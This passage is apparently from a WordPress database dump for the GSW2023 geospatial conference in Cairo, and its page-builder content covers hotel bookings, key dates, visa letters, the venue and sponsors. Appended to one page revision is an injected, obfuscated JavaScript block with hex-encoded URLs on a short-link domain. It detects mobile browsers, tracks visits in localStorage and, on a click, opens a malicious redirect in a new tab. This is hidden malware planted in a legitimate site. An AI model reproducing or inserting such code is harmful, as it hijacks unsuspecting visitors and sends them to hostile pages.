height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 03:49:01','2023-08-13 03:49:01','',3066,'https://gsw2023.com/?p=5095',0,'revision','',0),
(5096,1,'2023-08-13 03:50:23','2023-08-13 03:50:23','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\">Prime Sponsor</span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]\r\n\r\n<img class=\"alignnone wp-image-5093 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum 